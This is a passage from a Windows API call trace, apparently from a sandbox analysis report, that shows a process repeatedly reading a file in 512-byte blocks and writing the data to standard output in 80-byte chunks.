nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.051] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.051] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.052] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.052] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.053] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.053] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.054] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.054] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.055] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.055] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.056] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.056] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.058] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.058] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: 